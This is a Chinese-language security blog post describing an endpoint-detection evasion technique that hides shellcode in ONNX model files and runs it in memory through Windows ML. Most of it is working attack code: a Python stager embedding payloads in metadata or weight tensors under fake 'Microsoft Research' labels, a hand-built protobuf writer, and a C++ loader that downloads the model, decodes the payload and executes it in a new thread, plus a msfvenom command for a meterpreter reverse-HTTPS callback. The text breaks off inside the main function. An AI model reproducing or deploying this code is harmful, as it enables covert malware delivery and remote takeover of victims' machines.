免杀新姿势:利用Windows机器学习(WinML)在内存中隐蔽执行恶意载荷

admin 2026-05-11 06:40:23 网络安全文章 来源:ZONE.CI 全球网 0 阅读模式

文章总结: 该文档详细介绍了一种利用Windows机器学习框架(WinML)进行恶意载荷免杀的新技术。攻击者通过将Shellcode嵌入合法ONNX模型的Protobuf结构中(如metadataprops或initializer.rawdata字段),利用WinMLAPI直接从内存加载模型并执行载荷,有效规避EDR的行为检测。文档提供了完整的Python实现代码,包括ONNX模型构造和载荷提取逻辑,展示了如何使恶意调用链伪装成正常的机器学习推理任务。 综合评分: 87 文章分类: 免杀,恶意软件,红队,漏洞分析,二进制安全


cover_image

免杀新姿势:利用 Windows 机器学习(WinML)在内存中隐蔽执行恶意载荷

原创

老鑫安全 老鑫安全

老鑫安全

2026年5月10日 12:19 中国香港

在小说阅读器读本章

去阅读

#

攻击者正在滥用 Windows 内置的机器学习框架,将恶意载荷隐藏在合法的 ONNX 模型文件中,骗过 EDR 的行为检测。


前言

红队与 EDR 的军备竞赛从未停歇:EDR 厂商越来越擅长标记可疑的 API 调用序列、Shellcode 模式以及反射式加载器。与此同时,Windows 不断推出新的合法子系统,而这些子系统很少从攻击视角被深入审计。

Windows Machine Learning(WinML)——自 Windows 10 1809(build 17763)起内置——就是这样一个被忽视的子系统。它为应用程序提供了纯本地的 C++/WinRT API,用于加载和运行 ONNX 格式的机器学习模型。如今,每台现代 Windows 机器都装有 WinML,每个“支持 AI”的桌面应用都在使用它。然而,几乎没有安全产品会仔细审查它的行为。

本文将完整介绍一种利用 WinML 的攻击技术,包括:

  • • 构造一个合法的 ONNX 模型,将任意载荷嵌入其 Protobuf 结构中
  • • 利用 WinML API 直接从内存加载模型,不在磁盘留下任何痕迹
  • • 提取并执行载荷,同时让整个调用链看起来像普通的机器学习推理任务

我们将提供完整的 POC 代码。最终生成的二进制文件,其导入表、API 调用模式、运行时行为都与正常的机器学习推理应用毫无差别。


为什么选择 WinML?攻击者的视角

✅ 合法的导入表

当你链接 windowsapp.lib 并使用 WinML 头文件时,二进制文件的导入表会显示:

windowsapp.dll
  - RoGetActivationFactory
  - RoInitialize
  - WindowsCreateString
  ...

这正是成百上千个合法机器学习应用中会出现的导入函数——照片编辑器、辅助工具、视频会议中的背景分割……没有哪家 EDR 会将 windowsapp.dll 导入标记为可疑。

✅ 行为混合

在运行时,WinML 的加载路径会生成:

  • • Microsoft-Windows-AI-MachineLearning 提供程序产生的 ETW 事件(模型加载)
  • • COM 激活轨迹 (Windows.AI.MachineLearning.LearningModel)
  • • ONNX Runtime 的详细日志

行为分析系统看到的是一个应用程序在正常加载 ML 模型——一切如常。

✅ 没有可疑的内存模式

与反射式 DLL 注入或手动 PE 映射不同,通过 WinML 加载 ONNX 模型使用的是微软自己的代码路径。内存分配来自 onnxruntime.dll 内部,而不是手写的 VirtualAlloc + memcpy 序列。

✅ Content-Type 伪装

通过网络传输的 ONNX 模型,Content-Type 通常是 application/octet-stream 或 application/x-protobuf,与正常的模型下载无法区分。大量 ML 应用会从云端点拉取模型,网络监控工具根本没有“恶意 ONNX 模型”的特征签名。


ONNX Protobuf 格式深度解析

在嵌入载荷之前,我们首先需要理解 ONNX 的容器格式。ONNX 使用 Protocol Buffers(protobuf)序列化,顶层结构是 ModelProto

message ModelProto {
  int64 ir_version = 1;          // IR 版本(当前为 8)
  repeated OperatorSetIdProto opset_import = 8;
  GraphProto graph = 7;          // 计算图
  repeated StringStringEntryProto metadata_props = 14;  // ← 我们的目标
}

message GraphProto {
  repeated NodeProto node = 1;   // 算子
  string name = 2;               // 图名称
  repeated ValueInfoProto input = 11;
  repeated ValueInfoProto output = 12;
  repeated TensorProto initializer = 5;  // ← 另一个目标
}

message TensorProto {
  repeated int64 dims = 1;
  int32 data_type = 2;
  bytes raw_data = 13;           // ← 原始字节目标
  string name = 8;
}

三个天然的嵌入点:

| 位置 | 字段 | 容量 | 隐蔽性 | | — | — | — | — | | metadata_props | ModelProto 的 field 14 | 无限的键值对 | 高——元数据被推理引擎忽略 | | initializer.raw_data | TensorProto 的 field 13 | 任意字节数组 | 极高——看起来像模型权重 | | NodeProto.attribute | NodeProto 的 field 5 | 字节张量 | 中等——异常的 attribute 大小可能引人注意 |

其中 raw_data 方法最有趣:模型权重张量通常包含数兆字节的浮点数据。50KB 的 Shellcode 隐藏在正常的模型权重中,几乎无法被察觉。


第一步:构建武器化 ONNX 模型(Python)

我们将创建一个最小可用的 ONNX 模型,并通过两种方式嵌入载荷:元数据(metadata)和权重(weights)。

方法 A:元数据嵌入

#!/usr/bin/env python3
# onnx_stager.py - 将任意载荷嵌入合法的 ONNX 模型
import onnx
from onnx import helper, TensorProto, numpy_helper
import numpy as np
import sys
import base64

def create_staged_model(payload_path: str, output_path: str, method: str = "metadata"):
    with open(payload_path, "rb") as f:
        payload = f.read()

    # 构造一个最小但合法的计算图:Identity 节点(输入=输出)
    X = helper.make_tensor_value_info("input", TensorProto.FLOAT, [1, 3, 224, 224])
    Y = helper.make_tensor_value_info("output", TensorProto.FLOAT, [1, 3, 224, 224])
    node = helper.make_node("Identity", inputs=["input"], outputs=["output"])

    if method == "metadata":
        # 将载荷分块并 base64 编码后放入 metadata_props
        CHUNK_SIZE = 65536
        chunks = []
        for i in range(0, len(payload), CHUNK_SIZE):
            chunk = payload[i:i+CHUNK_SIZE]
            chunks.append(base64.b64encode(chunk).decode())

        metadata = {
            "model_author": "Microsoft Research",
            "model_version": "2.1.0",
            "model_description": "Image classification model for edge inference",
            "payload_chunks": str(len(chunks)),
        }
        for i, chunk in enumerate(chunks):
            metadata[f"weight_hash_{i}"] = chunk

        metadata_props = [helper.make_entry(k, v) for k, v in metadata.items()]
        graph = helper.make_graph([node], "inference_graph", [X], [Y])
        model = helper.make_model(graph, opset_imports=[helper.make_opsetid("", 13)])
        model.metadata_props.extend(metadata_props)

    elif method == "weights":
        # 将载荷填充对齐到 float32 边界,然后解释为模型权重
        padded = payload + b"\x00" * ((4 - len(payload) % 4) % 4)
        weight_array = np.frombuffer(padded, dtype=np.float32)
        total_floats = len(weight_array)
        weight_tensor = numpy_helper.from_array(
            weight_array.reshape(1, 1, 1, total_floats),
            name="conv1.weight"
        )
        size_tensor = numpy_helper.from_array(
            np.array([len(payload)], dtype=np.int64),
            name="conv1.bias"
        )
        graph = helper.make_graph(
            [node], "inference_graph", [X], [Y],
            initializer=[weight_tensor, size_tensor]
        )
        model = helper.make_model(graph, opset_imports=[helper.make_opsetid("", 13)])

    onnx.checker.check_model(model)
    onnx.save(model, output_path)
    print(f"[+] 已生成 {output_path},载荷大小:{len(payload)} 字节,模型大小:{len(model.SerializeToString())} 字节")

if __name__ == "__main__":
    create_staged_model(sys.argv[1], sys.argv[2], sys.argv[3] if len(sys.argv) > 3 else "weights")

使用示例:

# 生成原始 shellcode(比如 Cobalt Strike / Sliver / msfvenom)
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.0.0.1 LPORT=443 -f raw -o beacon.bin

# 嵌入到 ONNX 模型(使用权重张量方法)
python3 onnx_stager.py beacon.bin staged_model.onnx weights

[+] 已生成 staged_model.onnx,载荷大小:510 字节,模型大小:612 字节

生成的 staged_model.onnx 是一个完全合法的 ONNX 模型。用 Netron 打开,你会看到一个看起来完全正常的神经网络计算图,附带权重张量——载荷字节与正常的浮点数权重无法区分。


第二步:纯 Protobuf 构造(无依赖)

在某些操作环境中,你可能无法安装 onnx Python 包。下面展示如何从零构造 ONNX protobuf,不依赖任何第三方库:

#!/usr/bin/env python3
# onnx_raw_stager.py - 纯手搓 ONNX protobuf,零依赖
import struct, sys, base64

def write_varint(value):
    result = bytearray()
    while value > 0x7F:
        result.append((value & 0x7F) | 0x80)
        value >>= 7
    result.append(value & 0x7F)
    return bytes(result)

def write_field(field_number, wire_type, data):
&nbsp; &nbsp; tag = write_varint((field_number <<&nbsp;3) | wire_type)
&nbsp; &nbsp; if&nbsp;wire_type ==&nbsp;0:
&nbsp; &nbsp; &nbsp; &nbsp; return&nbsp;tag + write_varint(data)
&nbsp; &nbsp; elif&nbsp;wire_type ==&nbsp;2:
&nbsp; &nbsp; &nbsp; &nbsp; return&nbsp;tag + write_varint(len(data)) + data
&nbsp; &nbsp; raise&nbsp;ValueError

def&nbsp;bytes_field(fld, data):&nbsp;return&nbsp;write_field(fld,&nbsp;2, data)
def&nbsp;string_field(fld, s):&nbsp; &nbsp;return&nbsp;bytes_field(fld, s.encode("utf-8"))
def&nbsp;varint_field(fld, val):&nbsp;return&nbsp;write_field(fld,&nbsp;0, val)

def&nbsp;build_onnx_with_payload(payload:&nbsp;bytes) ->&nbsp;bytes:
&nbsp; &nbsp; # 构造一个 Identity 计算图
&nbsp; &nbsp; dim = varint_field(1,&nbsp;1)
&nbsp; &nbsp; shape = bytes_field(1, dim)
&nbsp; &nbsp; tensor_type = varint_field(1,&nbsp;1) + bytes_field(2, shape)
&nbsp; &nbsp; type_proto = bytes_field(1, tensor_type)
&nbsp; &nbsp; vi_input = string_field(1,&nbsp;"input") + bytes_field(2, type_proto)
&nbsp; &nbsp; vi_output = string_field(1,&nbsp;"output") + bytes_field(2, type_proto)
&nbsp; &nbsp; node = string_field(1,&nbsp;"input") + string_field(2,&nbsp;"output") + string_field(4,&nbsp;"Identity")
&nbsp; &nbsp; graph = (bytes_field(1, node) + string_field(2,&nbsp;"model") +
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;bytes_field(11, vi_input) + bytes_field(12, vi_output))
&nbsp; &nbsp; opset = varint_field(2,&nbsp;13)
&nbsp; &nbsp; model = varint_field(1,&nbsp;8) + bytes_field(8, opset) + bytes_field(7, graph)

&nbsp; &nbsp; # 将载荷分块 base64 后放入 metadata_props
&nbsp; &nbsp; CHUNK =&nbsp;65536
&nbsp; &nbsp; chunks = [payload[i:i+CHUNK]&nbsp;for&nbsp;i&nbsp;in&nbsp;range(0,&nbsp;len(payload), CHUNK)]
&nbsp; &nbsp; cover = [("producer_name",&nbsp;"Microsoft.ML.OnnxRuntime"), ("version",&nbsp;"1.16.0"),
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;("description",&nbsp;"Optimized vision model"), ("payload_size",&nbsp;str(len(payload))),
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;("chunk_count",&nbsp;str(len(chunks)))]
&nbsp; &nbsp; for&nbsp;k, v&nbsp;in&nbsp;cover:
&nbsp; &nbsp; &nbsp; &nbsp; model += bytes_field(14, string_field(1, k) + string_field(2, v))
&nbsp; &nbsp; for&nbsp;i, chunk&nbsp;in&nbsp;enumerate(chunks):
&nbsp; &nbsp; &nbsp; &nbsp; b64 = base64.b64encode(chunk).decode()
&nbsp; &nbsp; &nbsp; &nbsp; entry = string_field(1,&nbsp;f"weight_hash_{i}") + string_field(2, b64)
&nbsp; &nbsp; &nbsp; &nbsp; model += bytes_field(14, entry)
&nbsp; &nbsp; return&nbsp;model

if&nbsp;__name__ ==&nbsp;"__main__":
&nbsp; &nbsp; with&nbsp;open(sys.argv[1],&nbsp;"rb")&nbsp;as&nbsp;f:
&nbsp; &nbsp; &nbsp; &nbsp; payload = f.read()
&nbsp; &nbsp; model_bytes = build_onnx_with_payload(payload)
&nbsp; &nbsp; with&nbsp;open(sys.argv[2],&nbsp;"wb")&nbsp;as&nbsp;f:
&nbsp; &nbsp; &nbsp; &nbsp; f.write(model_bytes)
&nbsp; &nbsp; print(f"[+]&nbsp;{sys.argv[2]}:&nbsp;{len(model_bytes)}&nbsp;字节(载荷:{len(payload)}&nbsp;字节)")

这个脚本生成的模型与 onnx 库生成的字节完全相同,可以安全地在最小化部署环境中运行。


第三步:WinML 加载器(C++)

在目标机器上,我们使用微软官方的 WinML API 加载构造好的 ONNX 模型,从 protobuf 元数据中提取载荷,并执行。

头文件与库

// winml_loader.cpp
#define&nbsp;WIN32_LEAN_AND_MEAN
#define&nbsp;NOMINMAX
#include&nbsp;<windows.h>
#include&nbsp;<winhttp.h>
#include&nbsp;<string>
#include&nbsp;<vector>
#include&nbsp;<map>
#include&nbsp;<cstdio>

#include&nbsp;<winrt/base.h>
#include&nbsp;<winrt/Windows.Foundation.h>
#include&nbsp;<winrt/Windows.AI.MachineLearning.h>
#include&nbsp;<winrt/Windows.Storage.Streams.h>

#pragma&nbsp;comment(lib,&nbsp;"windowsapp")
#pragma&nbsp;comment(lib,&nbsp;"winhttp")

using&nbsp;namespace&nbsp;winrt;
using&nbsp;namespace&nbsp;winrt::Windows::AI::MachineLearning;
using&nbsp;namespace&nbsp;winrt::Windows::Storage::Streams;

轻量级 Protobuf 解析器

我们只关心 metadata_props(field 14),所以手写一个最小解析器:

namespace&nbsp;pb {
&nbsp; &nbsp;&nbsp;static&nbsp;uint64_t&nbsp;read_varint(const&nbsp;uint8_t* data,&nbsp;size_t& pos,&nbsp;size_t&nbsp;len)&nbsp;{
&nbsp; &nbsp; &nbsp; &nbsp; uint64_t&nbsp;result =&nbsp;0;&nbsp;int&nbsp;shift =&nbsp;0;
&nbsp; &nbsp; &nbsp; &nbsp; while&nbsp;(pos < len) {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; uint8_t&nbsp;b = data[pos++];
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; result |= (uint64_t)(b &&nbsp;0x7F) << shift;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; if&nbsp;(!(b &&nbsp;0x80))&nbsp;break;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; shift +=&nbsp;7;
&nbsp; &nbsp; &nbsp; &nbsp; }
&nbsp; &nbsp; &nbsp; &nbsp; return&nbsp;result;
&nbsp; &nbsp; }
}

static&nbsp;std::map<std::string, std::string>&nbsp;parse_onnx_metadata(const&nbsp;std::vector<uint8_t>& data)&nbsp;{
&nbsp; &nbsp; std::map<std::string, std::string> metadata;
&nbsp; &nbsp; size_t&nbsp;pos =&nbsp;0;
&nbsp; &nbsp; const&nbsp;uint8_t* d = data.data();
&nbsp; &nbsp; size_t&nbsp;len = data.size();

&nbsp; &nbsp; while&nbsp;(pos < len) {
&nbsp; &nbsp; &nbsp; &nbsp; uint64_t&nbsp;tag = pb::read_varint(d, pos, len);
&nbsp; &nbsp; &nbsp; &nbsp; uint32_t&nbsp;field = (uint32_t)(tag >>&nbsp;3);
&nbsp; &nbsp; &nbsp; &nbsp; uint32_t&nbsp;wire &nbsp;= (uint32_t)(tag &&nbsp;7);

&nbsp; &nbsp; &nbsp; &nbsp; if&nbsp;(wire ==&nbsp;2) {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; uint64_t&nbsp;flen = pb::read_varint(d, pos, len);
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; if&nbsp;(field ==&nbsp;14) {&nbsp; // metadata_props
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; std::string key, value;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; size_t&nbsp;iend = pos + (size_t)flen;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; size_t&nbsp;ipos = pos;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; while&nbsp;(ipos < iend) {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; uint64_t&nbsp;itag = pb::read_varint(d, ipos, iend);
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; uint32_t&nbsp;inum &nbsp;= (uint32_t)(itag >>&nbsp;3);
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; uint32_t&nbsp;iwire = (uint32_t)(itag &&nbsp;7);
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; if&nbsp;(iwire ==&nbsp;2) {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; uint64_t&nbsp;slen = pb::read_varint(d, ipos, iend);
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; std::string&nbsp;s((const&nbsp;char*)(d + ipos), (size_t)slen);
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; ipos += (size_t)slen;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; if&nbsp;(inum ==&nbsp;1) key = s;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; else&nbsp;if&nbsp;(inum ==&nbsp;2) value = s;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }&nbsp;else&nbsp;if&nbsp;(iwire ==&nbsp;0) {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; pb::read_varint(d, ipos, iend);
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }&nbsp;else&nbsp;break;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; if&nbsp;(!key.empty()) metadata[key] = value;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; pos += (size_t)flen;
&nbsp; &nbsp; &nbsp; &nbsp; }&nbsp;else&nbsp;if&nbsp;(wire ==&nbsp;0&nbsp;|| wire ==&nbsp;1&nbsp;|| wire ==&nbsp;5) {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; // 跳过其他类型
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; if&nbsp;(wire ==&nbsp;0) pb::read_varint(d, pos, len);
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; else&nbsp;if&nbsp;(wire ==&nbsp;1) pos +=&nbsp;8;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; else&nbsp;if&nbsp;(wire ==&nbsp;5) pos +=&nbsp;4;
&nbsp; &nbsp; &nbsp; &nbsp; }&nbsp;else&nbsp;break;
&nbsp; &nbsp; }
&nbsp; &nbsp; return&nbsp;metadata;
}

从内存加载模型(关键)

这是整个技术的核心:使用 InMemoryRandomAccessStream 直接从内存字节加载 ONNX 模型,全程不触碰磁盘。

static&nbsp;bool&nbsp;load_model_winml(const&nbsp;std::vector<uint8_t>& model_bytes)&nbsp;{
&nbsp; &nbsp; try&nbsp;{
&nbsp; &nbsp; &nbsp; &nbsp; InMemoryRandomAccessStream stream;
&nbsp; &nbsp; &nbsp; &nbsp; DataWriter&nbsp;writer(stream);
&nbsp; &nbsp; &nbsp; &nbsp; writer.WriteBytes(winrt::array_view<const&nbsp;uint8_t>(model_bytes));
&nbsp; &nbsp; &nbsp; &nbsp; writer.StoreAsync().get();
&nbsp; &nbsp; &nbsp; &nbsp; writer.FlushAsync().get();
&nbsp; &nbsp; &nbsp; &nbsp; writer.DetachStream();
&nbsp; &nbsp; &nbsp; &nbsp; stream.Seek(0);

&nbsp; &nbsp; &nbsp; &nbsp; auto&nbsp;ref = RandomAccessStreamReference::CreateFromStream(stream);
&nbsp; &nbsp; &nbsp; &nbsp; auto&nbsp;model = LearningModel::LoadFromStream(ref);

&nbsp; &nbsp; &nbsp; &nbsp; // 此时:
&nbsp; &nbsp; &nbsp; &nbsp; // - ETW 会产生 "Microsoft.AI.MachineLearning" 模型加载事件
&nbsp; &nbsp; &nbsp; &nbsp; // - 进程映射了合法的 WinML DLL(onnxruntime.dll 等)
&nbsp; &nbsp; &nbsp; &nbsp; // - 行为分析会看到正常的 ML 推理工作负载
&nbsp; &nbsp; &nbsp; &nbsp; printf("[+] WinML 模型已加载:%ws\n", model.Name().c_str());
&nbsp; &nbsp; &nbsp; &nbsp; return&nbsp;true;
&nbsp; &nbsp; }&nbsp;catch&nbsp;(const&nbsp;winrt::hresult_error& e) {
&nbsp; &nbsp; &nbsp; &nbsp; printf("[-] WinML 加载失败:0x%08X\n", (uint32_t)e.code());
&nbsp; &nbsp; &nbsp; &nbsp; return&nbsp;false;
&nbsp; &nbsp; }
}

载荷提取与执行

static&nbsp;std::vector<uint8_t>&nbsp;b64_decode(const&nbsp;std::string& s)&nbsp;{
&nbsp; &nbsp; static&nbsp;const&nbsp;char&nbsp;b64[] =&nbsp;"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
&nbsp; &nbsp; int&nbsp;T[256];&nbsp;memset(T,&nbsp;-1,&nbsp;sizeof(T));
&nbsp; &nbsp; for&nbsp;(int&nbsp;i =&nbsp;0; i <&nbsp;64; i++) T[(unsigned&nbsp;char)b64[i]] = i;
&nbsp; &nbsp; std::vector<uint8_t> out;
&nbsp; &nbsp; int&nbsp;val =&nbsp;0, bits =&nbsp;-8;
&nbsp; &nbsp; for&nbsp;(unsigned&nbsp;char&nbsp;c : s) {
&nbsp; &nbsp; &nbsp; &nbsp; if&nbsp;(T[c] ==&nbsp;-1)&nbsp;break;
&nbsp; &nbsp; &nbsp; &nbsp; val = (val <<&nbsp;6) + T[c];
&nbsp; &nbsp; &nbsp; &nbsp; bits +=&nbsp;6;
&nbsp; &nbsp; &nbsp; &nbsp; if&nbsp;(bits >=&nbsp;0) {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; out.push_back((uint8_t)((val >> bits) &&nbsp;0xFF));
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; bits -=&nbsp;8;
&nbsp; &nbsp; &nbsp; &nbsp; }
&nbsp; &nbsp; }
&nbsp; &nbsp; return&nbsp;out;
}

static&nbsp;bool&nbsp;extract_and_execute(const&nbsp;std::vector<uint8_t>& model_bytes)&nbsp;{
&nbsp; &nbsp; auto&nbsp;metadata =&nbsp;parse_onnx_metadata(model_bytes);
&nbsp; &nbsp; int&nbsp;payload_size = std::stoi(metadata["payload_size"]);
&nbsp; &nbsp; int&nbsp;chunk_count = std::stoi(metadata["chunk_count"]);
&nbsp; &nbsp; if&nbsp;(payload_size ==&nbsp;0&nbsp;|| chunk_count ==&nbsp;0)&nbsp;return&nbsp;false;

&nbsp; &nbsp; std::vector<uint8_t> payload;
&nbsp; &nbsp; payload.reserve(payload_size);
&nbsp; &nbsp; for&nbsp;(int&nbsp;i =&nbsp;0; i < chunk_count; i++) {
&nbsp; &nbsp; &nbsp; &nbsp; std::string key =&nbsp;"weight_hash_"&nbsp;+ std::to_string(i);
&nbsp; &nbsp; &nbsp; &nbsp; auto&nbsp;chunk =&nbsp;b64_decode(metadata[key]);
&nbsp; &nbsp; &nbsp; &nbsp; payload.insert(payload.end(), chunk.begin(), chunk.end());
&nbsp; &nbsp; }
&nbsp; &nbsp; if&nbsp;(payload.size() > (size_t)payload_size) payload.resize(payload_size);
&nbsp; &nbsp; printf("[+] 已提取载荷:%zu 字节,来自 %d 个分块\n", payload.size(), chunk_count);

&nbsp; &nbsp; // 执行载荷
&nbsp; &nbsp; void* exec_mem =&nbsp;VirtualAlloc(NULL, payload.size(), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
&nbsp; &nbsp; if&nbsp;(!exec_mem)&nbsp;return&nbsp;false;
&nbsp; &nbsp; memcpy(exec_mem, payload.data(), payload.size());
&nbsp; &nbsp; DWORD old_protect;
&nbsp; &nbsp; VirtualProtect(exec_mem, payload.size(), PAGE_EXECUTE_READ, &old_protect);
&nbsp; &nbsp; HANDLE hThread =&nbsp;CreateThread(NULL,&nbsp;0, (LPTHREAD_START_ROUTINE)exec_mem,&nbsp;NULL,&nbsp;0,&nbsp;NULL);
&nbsp; &nbsp; if&nbsp;(hThread) {
&nbsp; &nbsp; &nbsp; &nbsp; printf("[+] 载荷正在线程 %lu 中执行\n",&nbsp;GetThreadId(hThread));
&nbsp; &nbsp; &nbsp; &nbsp; WaitForSingleObject(hThread, INFINITE);
&nbsp; &nbsp; &nbsp; &nbsp; CloseHandle(hThread);
&nbsp; &nbsp; }
&nbsp; &nbsp; VirtualFree(exec_mem,&nbsp;0, MEM_RELEASE);
&nbsp; &nbsp; return&nbsp;true;
}

网络获取模型(模拟正常下载)

static&nbsp;std::vector<uint8_t>&nbsp;fetch_model(const&nbsp;wchar_t* host, INTERNET_PORT port,
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;const&nbsp;wchar_t* path,&nbsp;bool&nbsp;tls)&nbsp;{
&nbsp; &nbsp; std::vector<uint8_t> result;
&nbsp; &nbsp; HINTERNET hSess =&nbsp;WinHttpOpen(L"Mozilla/5.0 (Windows NT 10.0; Win64; x64) Edge/120.0",
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; WINHTTP_ACCESS_TYPE_DEFAULT_PROXY,&nbsp;NULL,&nbsp;NULL,&nbsp;0);
&nbsp; &nbsp; if&nbsp;(!hSess)&nbsp;return&nbsp;result;
&nbsp; &nbsp; HINTERNET hConn =&nbsp;WinHttpConnect(hSess, host, port,&nbsp;0);
&nbsp; &nbsp; if&nbsp;(!hConn) {&nbsp;WinHttpCloseHandle(hSess);&nbsp;return&nbsp;result; }
&nbsp; &nbsp; DWORD flags = tls ? WINHTTP_FLAG_SECURE :&nbsp;0;
&nbsp; &nbsp; HINTERNET hReq =&nbsp;WinHttpOpenRequest(hConn,&nbsp;L"GET", path,&nbsp;NULL,
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; WINHTTP_NO_REFERER, WINHTTP_DEFAULT_ACCEPT_TYPES, flags);
&nbsp; &nbsp; if&nbsp;(!hReq) {&nbsp;WinHttpCloseHandle(hConn);&nbsp;WinHttpCloseHandle(hSess);&nbsp;return&nbsp;result; }
&nbsp; &nbsp; WinHttpAddRequestHeaders(hReq,&nbsp;L"Accept: application/octet-stream, application/x-protobuf\r\n",
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;-1L, WINHTTP_ADDREQ_FLAG_ADD);
&nbsp; &nbsp; if&nbsp;(WinHttpSendRequest(hReq,&nbsp;NULL,&nbsp;0,&nbsp;NULL,&nbsp;0,&nbsp;0,&nbsp;0) &&&nbsp;WinHttpReceiveResponse(hReq,&nbsp;NULL)) {
&nbsp; &nbsp; &nbsp; &nbsp; DWORD avail =&nbsp;0;
&nbsp; &nbsp; &nbsp; &nbsp; do&nbsp;{
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; WinHttpQueryDataAvailable(hReq, &avail);
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; if&nbsp;(avail >&nbsp;0) {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; std::vector<uint8_t>&nbsp;chunk(avail);
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; DWORD rd =&nbsp;0;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; WinHttpReadData(hReq, chunk.data(), avail, &rd);
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; result.insert(result.end(), chunk.begin(), chunk.begin() + rd);
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }
&nbsp; &nbsp; &nbsp; &nbsp; }&nbsp;while&nbsp;(avail >&nbsp;0);
&nbsp; &nbsp; }
&nbsp; &nbsp; WinHttpCloseHandle(hReq);&nbsp;WinHttpCloseHandle(hConn);&nbsp;WinHttpCloseHandle(hSess);
&nbsp; &nbsp; return&nbsp;result;
}

主函数

int&nbsp;main()&nbsp;{
&nbsp; &nbsp; CoInitializeEx(NULL, COINIT_MULTITHREADED);
&nbsp; &nbsp; try&nbsp;{ winrt::init_apartment(); }&nbsp;catch&nbsp;(...) {}

&nbsp; &nbsp; printf("[*] 正在从远程服务器获取模型...\n");
&nbsp; &nbsp; auto&nbsp;model_bytes =&nbsp;fetch_model(L"models.example.com",&nbsp;443,
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;L"/v1/models/vision_classifier_v2.onnx",&nbsp;true);
&nbsp; &nbsp; if&nbsp;(model_bytes.empty())&nbsp;return&nbsp;1;
